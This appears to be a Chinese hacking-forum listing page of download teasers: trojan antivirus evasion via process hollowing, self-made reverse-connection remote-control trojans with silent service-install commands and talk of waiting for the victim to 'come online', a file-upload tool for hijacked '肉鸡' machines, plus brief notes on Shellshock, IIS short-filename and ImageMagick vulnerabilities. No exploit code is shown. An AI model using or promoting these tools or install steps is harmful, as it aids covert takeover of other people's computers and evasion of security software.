Win10 进程镂空技术(木马免杀)


/soft/Win10 进程镂空技术(木马免杀)_src.rar /soft/Win10 进程镂空技术(木马免杀).exe

查看更多...

Tags: 木马木马

网站应用安全评估系统即是一款用于Web应用远程安全检测的软件产品。
可下载安装，支持Windows操作系统，
用于对自己的网站进行日常的安全检查。
适用对象：网站规模和数量较小的企业、学校、事业单位等。
价格： 6,000元/年 ，3,000元/月，试用30次无限制。

查看更多...

Tags: 扫描器扫描器

2014年9月24日Bash被公布存在远程代码执行漏洞，河马安全网第一时间根据信息研判，确认该漏洞可以
产生严重的后果，且分布广泛，于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。
河马安全网针对该漏洞进行了严格地分析验证，确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平
台，包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平

查看更多...

Tags: 0day0day

大家好，今天给大家带来一款我自主开发的 采用反弹端口技术 远程控制软件
版本是3.1
该版本主要实现了以下功能:
1. 远程控制
2. 屏幕查看

查看更多...

Tags: 远控远控

pcRemote是一款由我自主开发的反弹型远控软件，具有体积小、运行稳定等优点，
这个版本是v1.1 可以穿过windowsxp的防火墙

软件界面如下：

下载地址1

配置简单:
在主窗口中点击"配置服务端",在弹出的对话框中填上你的ip[域名]和端口即可.
设置本地监听端口:5550
开始安装...
安装方法：
1。pcserver.exe /install /silent
   将服务端安装为服务
2。net start pcsrv
   启动power client Remote server 服务
这样操作后，就等对方上线。。。。

软件具有的功能

查看更多...

Tags: 远控远控

DameWare软件是远控中的功能最多的一个，主要通过SMB协议进行远程控制，

使 用445端口通信。DameWare自带一个桌面访问插件，使用6129端口通信，并且可

查看更多...

/soft/DES_Decrypt.rar
/soft/DES_Encrypt.rar
/soft/加密、解密，控件.rar
/soft/DES_Test.rar

 

                                      译者：河马安全网

说起这个溢出是够震撼的，但是我测试的时候是有条件溢出的，

就是服务器必须是域控主机，而且是和智能卡功能相关的漏洞，

要不然不知道会有多少台服务器遭殃。

在我第一次测试的时候，由于没有配置域导致失败，

后来在配置windows 2003 域的时候，由于各种原因，

域没有配置成功，没办法往下测试，索性安装一台新的windows来测，

这次就好了，成功溢出，现在分享一下过程。

 

查看更多...

  

  

『河马』IE8上网无限制工具.rar

 

GET /browserwarning.php HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MyIE2; CNCDialer; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.isafe.cc Connection: Keep-Alive Cookie: zbx_sessionid=140947690dd2245c5fd5489b323c3fb8

 

GET / HTTP/1.1 Host: www.isafe.cc Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.0 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: zbx_sessionid=5c2966af200df29841b4e42b8de260af

 

查看更多...

Tags: 小工具小工具

先介绍iis短文件名漏洞，如果可以使用通配符"*" 和 "?"发送一个请求到iis，当iis接收到一个文件路径中包
含"~"的请求时，它的反应是不同的，基于这个特点，我们可以根据http的响应区分一个可用或者不可用的
文件。在以下的表中，文件validxxx.xxx是存在于网站服务器根目录的。(备注:xxx.xxx是指不确定，还需
要继续猜解判断)。下图主要是不同版本的iis根据请求的返回错误不同来判断是否存在某个文件。

查看更多...

Tags: 0day0day

ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。

由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。
ImageMagick这次被曝出的漏洞应该算是一个本地的命令执行漏洞,危害不是太大,但是由于大量的web程序都使用了他的拓展,导致这些本地命令执行漏洞在web的环境里可以被远程触发,变成了危害巨大的远程命令执行。

查看更多...

Tags: 0day0day

该文件只允许会员下载! 登录 | 注册

Tags: 0day0day

用于3389肉鸡上文件上传，下载。
大家都知道3389连接肉鸡后文件复制不容易，虽然
3389自己有文件复制的功能，但是我们有时觉得
不好用，所以我开发了这款软件，方便肉鸡上传文件。

查看更多...

Tags: 远控远控